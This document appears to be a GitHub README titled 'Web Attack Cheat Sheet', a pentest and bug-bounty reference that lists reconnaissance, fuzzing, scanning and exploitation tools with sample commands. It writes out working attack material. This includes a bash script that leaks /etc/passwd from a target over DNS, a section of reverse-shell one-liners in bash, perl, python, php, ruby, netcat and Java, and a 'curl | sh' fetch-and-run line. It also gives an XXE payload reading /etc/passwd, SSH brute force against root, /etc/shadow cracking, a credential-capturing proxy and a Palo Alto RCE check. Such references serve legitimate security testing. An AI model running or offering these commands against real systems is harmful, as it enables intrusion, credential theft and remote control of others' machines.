Skip to content
Switch branches/tags


Failed to load latest commit information.
Latest commit message
Commit time

Web Attack Cheat Sheet

Table of Contents


# This repo contains data dumps of Hackerone and Bugcrowd scopes (i.e. the domains that are eligible for bug bounty reports).

IP Enumeration
# This tool leverages ASN to look up IP addresses (IPv4 & IPv6) owned by a specific organization for reconnaissance purposes.
# Lookups for real IP starting from the favicon icon and using Shodan.
python3 --favicon-file favicon.ico -sc
# List all IP addresses in a given CIDR block
nmap -sL -n | awk '/Nmap scan report/{print $NF}'

Subdomain Enumeration
# This book intendes to be a reference for subdomain enumeration techniques.
# The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.
amass enum -passive -dir /tmp/amass_output/ -d -o dir/
# subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources.
subfinder -r,,, -t 10 -v -d -o dir/
# SubDomainizer is a tool designed to find hidden subdomains and secrets present is either webpage, Github, and external javascripts present in the given URL.
python3 -u -o dir/
# Powered by DNSGrep (
# A utility for quickly searching presorted DNS names. Built around the Rapid7 rdns & fdns dataset.
# Certificate Search
# Censys is the most reputable, exhaustive, and up-to-date source of Internet scan data in the world, so you see everything.
# Shodan is the world's first search engine for Internet-connected devices.
# Find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.
# FOFA (Cyberspace Assets Retrieval System) is the world's IT equipment search engine with more complete data coverage, and it has more complete DNA information of global networked IT equipment.
# ZoomEyeis China's first and world-renowned cyberspace search engine driven by 404 Laboratory of Knownsec. Through a large number of global surveying and mapping nodes, according to the global IPv4, IPv6 address and website domain name databases,it can continuously scan and identify multiple service port and protocols 24 hours a day, and finally map the whole or local cyberspace.
# Total Internet Inventory with the most comprehensive data that informs with unrivaled accuracy.
curl --request POST --url '{API_Key}&page=1&scroll=true' --data '{"filter":{"apex_domain":""}}' | jq '.records[].hostname' | sed 's/"//g' >> subdomains.txt
curl --request POST --url '{API_Key}&page=1&scroll=true' --data '{"filter":{"whois_email":""}}' | jq '.records[].hostname' | sed 's/"//g' >> domains.txt
# This free tool will allow you to find domain names owned by an individual person or company.
# Offering researchers and community members open access to data from Project Sonar, which conducts internet-wide surveys to gain insights into global exposure to common vulnerabilities.
# Mihari is a framework for continuous OSINT based threat hunting.

Wayback Machine
# Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for *.domain and output them on stdout.
cat subdomains.txt | waybackurls > waybackurls.txt
# Hacky one-off scripts, tests etc.
cat waybackurls.txt | go run /root/Tools/hacks/anti-burl/main.go | tee waybackurls_valid.txt

# This tool lists which web files on a website are cached and which are not. Furthermore it checks by which method these files are cached and what the expiry time of the cached files is.

# Fast web spider written in Go.
gospider -s "" -o output -c 20 -d 10

# Scrapes all unique words and numbers for use with password cracking.
# wordlistgen is a tool to pass a list of URLs and get back a list of relevant words for your wordlists.
cat hosts.txt | wordlistgen
# A tool which scrapes public github repositories for common naming conventions in variables, folders and files.
php gitscraper.php {GitHub Username} {GitHub Personal KEY}
# SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
# A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques.
# FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing.
# This project aims at hosting tutorials, examples, discussions, research proposals, and other resources related to fuzzing.
# The wordlists that have been compiled using disclosed reports at the HackerOne bug bounty platform.
# This website provides you with wordlists that are up to date and effective against the most popular technologies on the internet.

Directory Bruteforcing
# A fast web fuzzer written in Go.
ffuf -H 'User-Agent: Mozilla' -v -t 30 -w mydirfilelist.txt -b 'NAME1=VALUE1; NAME2=VALUE2' -u ''
# Gobuster is a tool used to brute-force.
gobuster dir -a 'Mozilla' -e -k -l -t 30 -w mydirfilelist.txt -c 'NAME1=VALUE1; NAME2=VALUE2' -u ''
# meg is a tool for fetching lots of URLs but still being 'nice' to servers.
meg -c 50 -H 'User-Agent: Mozilla' -s 200 weblogic.txt example.txt weblogic
# Cansina is a Web Content Discovery Application.
python3 -u '' -p mydirfilelist.txt --persist
# A simple, fast, recursive content discovery tool written in Rust.
feroxbuster -u '' -x pdf -x js,html -x php txt json,docx

Parameter Bruteforcing
# Arjun can find query parameters for URL endpoints.
arjun -u
# Hidden parameters discovery suite written in Rust.
x8 -u "" -w <wordlist>

DNS and HTTP detection
# Monitor service for security testing.
curl{API Key}&type=dns curl{API Key}&type=http
# Burp Collaborator is a network service that Burp Suite uses to help discover many kinds of vulnerabilities.
# Tip
# A simple HTTP Request & Response Service.
# Simple DNS and HTTP service for security testing.
# SnitchDNS is a database driven DNS Server with a Web UI, written in Python and Twisted, that makes DNS administration easier with all configuration changed applied instantly without restarting any system services.
# Simple DNS server with realitme logs.
# Interactsh is an Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions, For example - Blind SQLi, Blind CMDi, SSRF, etc.

# Hunter lets you find email addresses in seconds and connect with the people that matter for your business.
# Intelligence X is an independent European technology company founded in 2018 by Peter Kleissner. The company is based in Prague, Czech Republic. Its mission is to develop and maintain the search engine and data archive.
# Find companies based on their website's tech stack or code.
# h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services, or local breaches such as Troy Hunt's "Collection1" and the infamous "Breach Compilation" torrent.
h8mail -t
# Our person-first Identity Resolution Platform provides the crucial intelligence needed to drive Media Amplification, Omnichannel Measurement, and Customer Recognition.
# Our data empowers developers to build innovative, trusted data-driven products at scale.
# Free Social Media Search Engine.
# GHunt is an OSINT tool to extract information from any Google Account using an email.
python3 email

HTML/JavaScript Comments
# Burp Engagement Tools

Google Dorks
# Google Hacking Database

Content Security Policy (CSP)
# CSP Evaluator allows developers and security experts to check if a Content Security Policy (CSP) serves as a strong mitigation against cross-site scripting attacks.

Tiny URLs Services
# Cornell Tech Url Shortening Research
# urlhunter is a recon tool that allows searching on URLs that are exposed via shortener services such as and
urlhunter -keywords keywords.txt -date 2020-11-20 -o out.txt
# Search Shortener Urls

# A security testing tool to facilitate GraphQL technology security auditing efforts.
# Understanding GraphQL
# It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the introspection system!
# Practical GraphQL attack vectors
# Why and how to disable introspection query for GraphQL APIs
# Securing GraphQL
# GraphQL vs REST API model, common security test cases for GraphQL endpoints.
# GraphQL common vulnerabilities & how to exploit them.

# Asset Discovery is the initial phase of any security assessment engagement, be it offensive or defensive. With the evolution of information technology, the scope and definition of assets has also evolved.
# Spyse holds the largest database of its kind, containing a wide range of OSINT data handy for the reconnaissance.
# reNgine is an automated reconnaissance framework meant for information gathering during penetration testing of web applications.
# Search for a framework by favicon
# Script to automate, when possible, the passive reconnaissance performed on a website prior to an assessment.


# WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
whatweb -a 4 -U 'Mozilla' -c 'NAME1=VALUE1; NAME2=VALUE2' -t 20
# Find out what websites are Built With.
# Identify technologies on websites.
# Discover what technologies a website is built on or find out what websites use a particular web technology.
# Software Vulnerability Scanner Burp Extension
# It's a cheat sheet about behaviour of various reverse proxies and related attacks.

# List s3 bucket permissions and keys
aws s3api get-bucket-acl --bucket examples3bucketname
aws s3api get-object-acl --bucket examples3bucketname --key dir/file.ext
aws s3api list-objects --bucket examples3bucketname
aws s3api list-objects-v2 --bucket examples3bucketname
aws s3api get-object --bucket examples3bucketname --key dir/file.ext localfilename.ext
aws s3api put-object --bucket examples3bucketname --key dir/file.ext --body localfilename.ext
# Find interesting Amazon S3 Buckets by watching certificate transparency logs
# Search Public Buckets
# Burp Suite extension which can identify and test S3 buckets

Cloud Enumeration
# Found a set of AWS credentials and have no idea which permissions it might have?
# Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
# Prowler is a command line tool that helps you with AWS security assessment, auditing, hardening and incident response.
# Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.
# CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.
# Pacu is an open-source AWS exploitation framework, designed for offensive security testing against cloud environments.
# This Burp Suite extension can identify and test S3 buckets as well as Google Storage buckets and Azure Storage containers for common misconfiguration issues using the boto/boto3 SDK library.
# This repository is intented to have Google Cloud Security recommended practices, scripts and more.
# Instance metadata is data about your instance that you can use to configure or manage the running instance. Instance metadata is divided into categories, for example, host name, events, and security groups.
# Every instance stores its metadata on a metadata server. You can query this metadata server programmatically, from within the instance and from the Compute Engine API. You can query for information about the instance, such as the instance's host name, instance ID, startup and shutdown scripts, custom metadata, and service account information. Your instance automatically has access to the metadata server API without any additional authorization.
# The Azure Instance Metadata Service (IMDS) provides information about currently running virtual machine instances. You can use it to manage and configure your virtual machines. This information includes the SKU, storage, network configurations, and upcoming maintenance events.
# Metadata of an instance includes basic information of the instance in Alibaba Cloud, such as the instance ID, IP address, MAC addresses of network interface controllers (NICs) bound to the instance, and operating system type.
# Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments.

# Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE).

Visual Identification
# EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known.
eyewitness --web --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" --threads 10 --timeout 30 --prepend-https -f "${PWD}/subdomains.txt" -d "${PWD}/eyewitness/"
# Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
cat targets.txt | aquatone
# gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.
gowitness scan --cidr --threads 20


Static Application Security Testing
# Semgrep is a fast, open-source, static analysis tool that excels at expressing code standards — without complicated queries — and surfacing bugs early at editor, commit, and CI time.

Dependency Confusion
# How I Hacked Into Apple, Microsoft and Dozens of Other Companies.
# nodep check available dependency packages across npmjs, PyPI or RubyGems registry.
# A tool for checking for lingering free namespaces for private package names referenced in dependency configuration for Python (pypi) requirements.txt, JavaScript (npm) package.json, PHP (composer) composer.json or MVN (maven) pom.xml.

Send Emails
# Ticket Trick
# Abusing autoresponders and email bounces

# Send multiple emails
while read i; do echo $i; echo -e "From:\nTo: ${i}\nCc:\nSubject: This is the subject ${i}\n\nThis is the body ${i}" | ssmtp ${i},; done < emails.txt

Search Vulnerabilities
# Command line search and download tool for Vulners Database inspired by searchsploit.
getsploit wordpress 4.7.0
# Included in our Exploit Database repository on GitHub is searchsploit, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go.
searchsploit -t oracle windows
# Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems.
# Search across a half million git repos.
# Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
python3 -u --host your_vps_hostname_ip

Web Scanning
# Burp Scanner is a tool for automatically finding security vulnerabilities in web applications.
# Skipfish is an active web application security reconnaissance tool.
skipfish -MEU -S dictionaries/minimal.wl -W new_dict.wl -C "AuthCookie=value" -X /logout.aspx -o output_dir
# Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
nikto -ssl -host
# WordPress Security Scanner
wpscan --disable-tls-checks --ignore-main-redirect --user-agent 'Mozilla' -t 10 --force --wp-content-dir wp-content --url
# A plugin-based scanner that aids security researchers in identifying issues with several CMS.
droopescan scan drupal -u
# Nuclei is used to send requests across targets based on a template leading to zero false positives and providing fast scanning on large number of hosts.
nuclei -l urls.txt -t cves/ -t files/ -o results.txt
# reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform enumeration and finding out vulnerabilities. -d -a
# The new generation of network security technology achieves rapid security emergency through the establishment of a complete asset database for the target.
# By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.
python --url="" --data="ip=" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
# Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014.
python --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl
# The WebXmlExploiter is a tool to exploit exposed by misconfiguration or path traversal web.xml files.

HTTP Request Smuggling
# An HTTP Request Smuggling / Desync testing tool written in Python 3.
python3 -q -u

# Attacking through command line a HTTPS vulnerable service. Good for persistence when no one believes in you.
echo 'UE9TVCAvIEhUVFAvMS4xDQpIb3N0OiB5b3VyLWxhYi1pZC53ZWItc2VjdXJpdHktYWNhZGVteS5uZXQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogNg0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCg0KMA0KDQpH' | base64 -d | timeout 1 openssl s_client -quiet -connect &>/dev/null
# This tool helps to detect and exploit HTTP request smuggling in cases it can be achieved via HTTP/2 -> HTTP/1.1 conversion by the frontend server.
http2smugl detect
# h2cSmuggler smuggles HTTP traffic past insecure edge-server proxy_pass configurations by establishing HTTP/2 cleartext (h2c) communications with h2c-compatible back-end servers, allowing a bypass of proxy rules and access controls. -x --test
# Smuggling HTTP requests over fake WebSocket connection.
# HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users.
# This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you.
# This is how I was able to exploit a HTTP Request Smuggling in some Mobile Device Management (MDM) servers and send any MDM command to any device enrolled on them for a private bug bounty program.
# Modern web applications typically rely on chains of multiple servers, which forward HTTP requests to one another. The attack surface created by this forwarding is increasingly receiving more attention, including the recent popularisation of cache poisoning and request smuggling vulnerabilities. Much of this exploration, especially recent request smuggling research, has developed new ways to hide HTTP request headers from some servers in the chain while keeping them visible to others – a technique known as "header smuggling". This paper presents a new technique for identifying header smuggling and demonstrates how header smuggling can lead to cache poisoning, IP restriction bypasses, and request smuggling.
# Two Years Ago @albinowax Shown Us A New Technique To PWN Web Apps So Inspired By This Technique AND @defparam's Tool , I Have Been Collecting A Lot Of Mutations To Achieve Request Smuggling.
# It's a cheat sheet about behaviour of various reverse proxies and related attacks.

Subdomain Takeover
# Subdomain Takeover Scanner
tko-subs -data providers-data.csv -threads 20 -domains subdomains.txt
# Subover is a Hostile Subdomain Takeover tool originally written in python but rewritten from scratch in Golang. Since it's redesign, it has been aimed with speed and efficiency in mind.
SubOver -l subdomains.txt

SQLi (SQL Injection)
# sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap --force-ssl -r RAW_REQUEST.txt --user-agent='Mozilla' --batch
sqlmap -vv -u '*' --user-agent='Mozilla' --level 5 --risk 3 --batch

Repositories Scanning
# Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repos.
gitleaks --github-org=organization --threads=4 -v --disk
# Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.
# Searches through git repositories for secrets, digging deep into commit history and branches.
# Prevents you from committing passwords and other sensitive information to a git repository.
# shhgit helps secure forward-thinking development, operations, and security teams by finding secrets across their code before it leads to a security breach.

Google Dorks Scanning
# The goal of this project was to develop a passive Google dork script to collect potentially vulnerable web pages and applications on the Internet.
python3 -d -g dorks.txt -l 50 -s -e 35.0 -j 1.1

CORS Misconfigurations
# Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations.
python3 -u


# OpenCVE (formerly known as allows you to subscribe to vendors and products, and send you an alert as soon as a CVE is published or updated.


Brute Force
# Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.
hydra -l root -P 10-million-password-list-top-1000.txt -t 4 ssh
# John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.
unshadow /etc/passwd /etc/shadow > mypasswd.txt
john mypasswd.txt
# Hashcat is a password recovery tool.
hashcat -m 0 -a 0 hashes.txt passwords.txt
# Rotate the source IP address in order to bypass rate limits

# A bash script that automates the exfiltration of data over dns
# The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
# This tool can forward TCP traffic over DNS protocol. Non-compile clients + socks5 support.

# Pure bash exfiltration over dns
## Execute on target server (replace YOURBCID)

CMD="cat /etc/passwd"
HID=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)
CMDID=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)
M=$($CMD 2>&1); T=${#M}; O=0; S=30; I=1; while [ "${T}" -gt "0" ]; do C=$(echo ${M:${O}:${S}}|base64); C=${C//+/_0}; C=${C//\//_1}; C=${C//=/_2}; host -t A $I.${C}.$D&>/dev/null; O=$((${O}+${S})); T=$((${T}-${S})); I=$((I+1)); done

## Execute on attacker machine (replace YOURBIID) and extract Burp Collaborator results

RESULTS=$(curl -sk "${BCPURL}")

## Get IDs available

echo "${RESULTS}" | jq -cM '.responses[]' | while read LINE; do if [[ $LINE == *'"protocol":"dns'* ]]; then echo ${LINE} | jq -rM '.data.subDomain' | egrep --color=never "^[[:digit:]]+\..*\..*\.$BC$"; fi; done | sed -r 's/^[[:digit:]]+\.[^.]+\.([^.]+)\..*/\1/g' | sort -u

## Update ID and get command result (repeat for each ID)

echo "${RESULTS}" | jq -cM '.responses[]' | while read LINE; do if [[ $LINE == *'"protocol":"dns'* ]]; then echo ${LINE} | jq -rM '.data.subDomain' | egrep "^[[:digit:]]+\..*\..*\.$BC$"; fi; done | egrep "$ID" | sort -t. -k3 -g | sed -r 's/^[[:digit:]]+\.([^.]+)\..*/\1/g' | while read i; do i=${i//_0/+}; i=${i//_1/\/}; i=${i//_2/=}; echo ${i} | base64 -d; done


# PayloadsAllTheThings
# Unicode normalization good for WAF bypass.

# This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector.
# Forcing Firefox to Execute XSS Payloads during 302 Redirects.

# XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
# Information Security PENTEST XXE
# Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.

# We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections.\

# JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.
# This is a forked modified version of the great exploitation tool created by @welk1n (

SSRF (Server-Side Request Forgery)
# There is such a thing as SSRF. There’s lots of information about it, but here is my quick summary.
# A Glossary of Blind SSRF Chains.

DNS Rebinding
# Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
# DNS Rebind Toolkit is a frontend JavaScript framework for developing DNS Rebinding exploits against vulnerable hosts and services on a local area network (LAN).
# A malicious DNS server for executing DNS Rebinding attacks on the fly.
# Dead simple wildcard DNS for any IP Address
# is a DNS (Domain Name System) service that, when queried with a hostname with an embedded IP address, returns that IP Address.
# This is a small set of zero-configuration DNS utilities for assisting in detection and exploitation of SSRF-related vulnerabilities. It provides easy to use DNS rebinding utility, as well as a way to get resolvable resource records with any given contents.

SMTP Header Injection
# It is common practice for web pages and web applications to implement contact forms, which in turn send email messages to the intended recipients. Most of the time, such contact forms set headers. These headers are interpreted by the email library on the web server and turned into resulting SMTP commands, which are then processed by the SMTP server.
POST /contact.php HTTP/1.1

name=Best Product\nbcc: my product!

Reverse Shell
# If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
# Bash
bash -i >& /dev/tcp/ 0>&1

perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e'"",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat
nc -e /bin/sh 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

# xterm
xterm -display
Xnest :1
xhost +targetip
# Reverse Shell as a Service
nc -l 1337
curl | sh
# pwncat is a post-exploitation platform for Linux targets.

SQLi (SQL Injection)
# This paper describes an advanced SQL injection technique where DNS resolution process is exploited for retrieval of malicious SQL query results.

# Oracle


# Microsoft SQL Server

# PostgreSQL

SSTI (Server Side Template Injection)
# Template Injections (SSTI) in 10 minutes
# Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.
# Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. --os-shell -u ''

WebDAV (Web Distributed Authoring and Versioning)
# cadaver is a command-line WebDAV client for Unix.
# This program attempts to exploit WebDAV enabled servers.

Generic Tools
# The Cyber Swiss Army Knife
# Pcap analysis and samples


# Print only response headers for any method with curl
curl -skSL -D - -o /dev/null

# Pure bash multhread script


NUM=$(wc -l ${FILE} | awk '{ print $1 }')
while read SUBDOMAIN; do
        if [ $THREAD -lt $THREADS ]; then
                eval timeout ${TIMEOUT} ${CMD} 2>/dev/null &
                let THREAD++
                let NUMDOM++
                echo -ne "\r>Progress: ${NUMDOM} of ${NUM} ($(awk "BEGIN {printf \"%0.2f\",(${NUMDOM}*100)/${NUM}}")%)\r"
                while [ ${PIDSTAT} -eq 0 ]; do
                        for j in "${!PIDS[@]}"; do
                                kill -0 "${PIDS[j]}" > /dev/null 2>&1
                                if [ ${PIDSTAT} -ne 0 ]; then
                                        eval timeout ${TIMEOUT} ${CMD} 2>/dev/null &
                                        let NUMDOM++
                                        echo -ne "\r>Progress: ${NUMDOM} of ${NUM} ($(awk "BEGIN {printf \"%0.2f\",(${NUMDOM}*100)/${NUM}}")%)\r"
done < ${FILE}

# Reverse Proxy
mitmdump --certs ~/cert/cert.pem --listen-port 443 --scripts --set block_global=false --mode reverse: # Good for capture credentials

$ cat
import mitmproxy.http
from mitmproxy import ctx

def request(flow):
    if flow.request.method == "POST":

# Fake HTTP Server
while true ; do echo -e "HTTP/1.1 200 OK\nContent-Length: 0\n\n" | nc -vl 80; done
socat -v -d -d TCP-LISTEN:80,crlf,reuseaddr,fork 'SYSTEM:/bin/echo "HTTP/1.1 200 OK";/bin/echo "Content-Length: 2";/bin/echo;/bin/echo "OK"'
socat -v -d -d TCP-LISTEN:80,crlf,reuseaddr,fork 'SYSTEM:/bin/echo "HTTP/1.1 302 Found";/bin/echo "Content-Length: 0";/bin/echo "Location:";/bin/echo;/bin/echo'
FILE=image.jpg;socat -v -d -d TCP-LISTEN:80,fork "SYSTEM:/bin/echo 'HTTP/1.1 200 OK';/bin/echo 'Content-Length: '`wc -c<$FILE`;/bin/echo 'Content-Type: image/png';/bin/echo;dd 2>/dev/null<$FILE" # Present an image
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
php -S
ruby -run -e httpd . -p 80
busybox httpd -f -p 80

# Fake HTTPS Server
openssl req -new -x509 -keyout test.key -out test.crt -nodes
cat test.key test.crt > test.pem
socat -v -d -d openssl-listen:443,crlf,reuseaddr,cert=test.pem,verify=0,fork 'SYSTEM:/bin/echo "HTTP/1.1 200 OK";/bin/echo "Content-Length: 2";/bin/echo;/bin/echo "OK"'
socat -v -d -d openssl-listen:443,crlf,reuseaddr,cert=web.pem,verify=0,fork 'SYSTEM:/bin/echo "HTTP/1.1 302 Found";/bin/echo "Content-Length: 0";/bin/echo "Location:";/bin/echo;/bin/echo'
stunnel stunnel.conf # Check

# Python 3 Simple HTTPS Server

    import http.server, ssl
    server_address = ('', 443)
    httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
    httpd.socket = ssl.wrap_socket(httpd.socket, server_side=True, certfile='/path/cert.pem', ssl_version=ssl.PROTOCOL_TLS)

# Fake FTP Server
python -m pyftpdlib --directory=/tmp/dir/ --port=21

# Check HTTP or HTTPS
while read i; do curl -m 15 -ki http://$i &> /dev/null; if [ $? -eq 0 ]; then echo $i; fi; done < subdomains.txt
while read i; do curl -m 15 -ki https://$i &> /dev/null; if [ $? -eq 0 ]; then echo $i; fi; done < subdomains.txt

# Ten requests in parallel
xargs -I % -P 10 curl -H 'Connection: close' -s -D - -o /dev/null < <(printf '%s\n' {1..10000})

# Access target directly through IP address

# Trim space and newlines on bash variable
"${i//[$'\t\r\n ']}"
# GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems.
# Make Offline Mirror of a Site using wget
wget -mkEpnp

# Referer spoofing
<base href="">
@import 'https://CSRF.vulnerable.example/';
# Check PreAuth RCE on Palo Alto GlobalProtect
time curl -s -d 'scep-profile-name=%9999999c' https://${HOST}/sslmgr >/dev/null
time curl -s -d 'scep-profile-name=%99999999c' https://${HOST}/sslmgr >/dev/null
time curl -s -d 'scep-profile-name=%999999999c' https://${HOST}/sslmgr >/dev/null
# How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System (bypass with /..;/)
# Routing To Another Backend , Deserve Spending Hours AND Hours On Its So Inspired By @samwcyo's Talk " Attacking Secondary Contexts in Web Applications " , I Have Been Collecting A Lot Of Stuff To PWN This Backend.
# This is a story how I accidentally found a common vulnerability across similar web applications just by reusing cookies on different subdomains from the same web application.
# Checklist of the most important security countermeasures when designing, testing, and releasing your API.


Web Attack Cheat Sheet



No releases published


No packages published